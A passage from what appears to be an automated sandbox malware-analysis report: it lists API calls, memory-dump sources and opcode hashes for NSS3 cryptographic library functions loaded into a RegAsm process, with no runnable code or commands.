                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C975EC0,00000000,?,?), ref: 6C975CBE
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C975CD7
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C975CF0
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C975D09
                                                                                                                                                                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C975EC0,00000000,?,?), ref: 6C975D1F
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C975D3C
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C975D51
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C975D66
                                                                                                                                                                                                                                                                  • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C975D80
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                                                                  • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                                                                  • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                                                                  • Opcode ID: 3d358c28e6736bdec3b7684d214431605c8fe18c8e9db798cec9500bb3eb5794
                                                                                                                                                                                                                                                                  • Instruction ID: 3634196a14e490f3a34aab4ae9e4ec344711c27747e1f786fa64de625112d7f1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d358c28e6736bdec3b7684d214431605c8fe18c8e9db798cec9500bb3eb5794
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD31D4E07433526FEBA11A259E49B66377CAF0224CF244430ED55E6A82FB72D522C2B5
                                                                                                                                                                                                                                                                  Function 6C976CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CA41DE0,?), ref: 6C976CFE
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C976D26
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C976D70
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000480), ref: 6C976D82
                                                                                                                                                                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C976DA2
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C976DD8
                                                                                                                                                                                                                                                                  • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C976E60
                                                                                                                                                                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C976F19
                                                                                                                                                                                                                                                                  • PK11_DigestBegin.NSS3(00000000), ref: 6C976F2D
                                                                                                                                                                                                                                                                  • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C976F7B
                                                                                                                                                                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C977011
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C977033
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C97703F
                                                                                                                                                                                                                                                                  • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C977060
                                                                                                                                                                                                                                                                  • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C977087
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C9770AF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                  • Opcode ID: ebe31b6f92eff2c49f29fa63d1532b73e2e796558eafd403f389d1cafc3833b4
                                                                                                                                                                                                                                                                  • Instruction ID: a593ce7e2e195e143d2c4bc5fc399d28931c09eeba65c7aa1fe54fcc40f63838
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebe31b6f92eff2c49f29fa63d1532b73e2e796558eafd403f389d1cafc3833b4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04A119715162009BEB209B24CC55B6B36A8EF9130CF24893DE919DBB81E735D869C7B3
                                                                                                                                                                                                                                                                  Function 6C98AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98ADB1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96BE30: SECOID_FindOID_Util.NSS3(6C92311B,00000000,?,6C92311B,?), ref: 6C96BE44
                                                                                                                                                                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C98ADF4
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C98AE08
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C98AE25
                                                                                                                                                                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C98AE63
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C98AE4D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98AE93
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C98AECC
                                                                                                                                                                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C98AEDE
                                                                                                                                                                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C98AEE6
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98AEF5
                                                                                                                                                                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C98AF16
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                                  • String ID: security
                                                                                                                                                                                                                                                                  • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                                  • Opcode ID: 0df0479caa201b954a5b76e7585e2f82baf581e7f6b54a94a7471e1bf7493ec6
                                                                                                                                                                                                                                                                  • Instruction ID: 69f1933b8b78f4097cc7c7aeff5d84eabf67a92327f09d6f5b7afa19c1b1ac7e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df0479caa201b954a5b76e7585e2f82baf581e7f6b54a94a7471e1bf7493ec6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4412CB1806210ABEB214A189C45BAB32B8AF6130CF540D25E85497FC2FF39D559C6F3
                                                                                                                                                                                                                                                                  Function 6C9A5CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C9A2A28,00000060,00000001), ref: 6C9A2BF0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C9A2A28,00000060,00000001), ref: 6C9A2C07
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C9A2A28,00000060,00000001), ref: 6C9A2C1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A2BE0: free.MOZGLUE(?,00000000,00000000,?,6C9A2A28,00000060,00000001), ref: 6C9A2C4A
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D0F
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D4E
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D62
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D85
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D99
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5DFA
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5E33
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C9A5E3E
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C9A5E47
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5E60
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C9A5E78
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9A5EB9
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9A5EF0
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9A5F3D
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9A5F4B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4273776295-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6c922a7b7ed08b6057422a501402a2e56e8c6a1f60b55c1f04f598ba433281d6
                                                                                                                                                                                                                                                                  • Instruction ID: 28641ceb852a39be1d772b5ffec7fe7c5da0e1650ca4d9affac937a887afb7cb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c922a7b7ed08b6057422a501402a2e56e8c6a1f60b55c1f04f598ba433281d6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC719FB5A00B019FD700DF64D884A93B7B9FFA9308F148529E85E87B11EB31F956CB91
                                                                                                                                                                                                                                                                  Function 6C89DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C89DD56
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C89DD7C
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C89DE67
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C89DEC4
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89DECD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 2339628231-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: f5d1d11f09ff4284649af5655348afb60b4c576f55e63183a63e7c828914fde8
                                                                                                                                                                                                                                                                  • Instruction ID: 78c443764db1f277ea637145b917fcedea317fc1ef14b9cee1c9db554979525b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5d1d11f09ff4284649af5655348afb60b4c576f55e63183a63e7c828914fde8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5A1E6716043159FC720CF2DCA81A6AB7F5AF85308F158D2EF8859BB51D730E845CBA5
                                                                                                                                                                                                                                                                  Function 6C924CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_SignatureLen.NSS3(?), ref: 6C924D80
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C924D95
                                                                                                                                                                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C924DF2
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C924E2C
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C924E43
                                                                                                                                                                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C924E58
                                                                                                                                                                                                                                                                  • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C924E85
                                                                                                                                                                                                                                                                  • DER_Encode_Util.NSS3(?,?,6CA705A4,00000000), ref: 6C924EA7
                                                                                                                                                                                                                                                                  • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C924F17
                                                                                                                                                                                                                                                                  • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C924F45
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C924F62
                                                                                                                                                                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C924F7A
                                                                                                                                                                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C924F89
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C924FC8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                  • Opcode ID: 056df50ca82908a0007e022de2d42334970dc8bf9859d9fd5e8b08b8f9e6b308
                                                                                                                                                                                                                                                                  • Instruction ID: 88de61b92f677635ccabffd4b7e8712b6df609ae2f64e0ede347f8f586758043
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 056df50ca82908a0007e022de2d42334970dc8bf9859d9fd5e8b08b8f9e6b308
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0081C0B1918301AFE711CF24D840B9BB7E8AB94308F14852DF998DB644E735E914CF92
                                                                                                                                                                                                                                                                  Function 6C965C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C965C9B
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C965CF4
                                                                                                                                                                                                                                                                  • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C965CFD
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C965D42
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C965D4E
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C965D78
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C965E18
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C965E5E
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C965E72
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C965E8B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C95F854
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C95F868
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C95F882
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(04C483FF,?,?), ref: 6C95F889
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C95F8A4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C95F8AB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C95F8C9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(280F10EC,?,?), ref: 6C95F8D0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                                                                  • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                                                                  • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                                                                  • Opcode ID: ce94a8669baf369e037e0f5f3cc23d0dc244b57db012aa74f9569e99f5f3dc69
                                                                                                                                                                                                                                                                  • Instruction ID: e18458550ba6c33094de86d7009467f2841a9f3f77c0c0ca11faa88c14825583
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce94a8669baf369e037e0f5f3cc23d0dc244b57db012aa74f9569e99f5f3dc69
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D71D5B0A04201ABFF059F26DC4576A3279BF6531CF144135E80A9AFC3EB36E955C792
                                                                                                                                                                                                                                                                  Function 6C956C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C95781D,00000000,6C94BE2C,?,6C956B1D,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C40
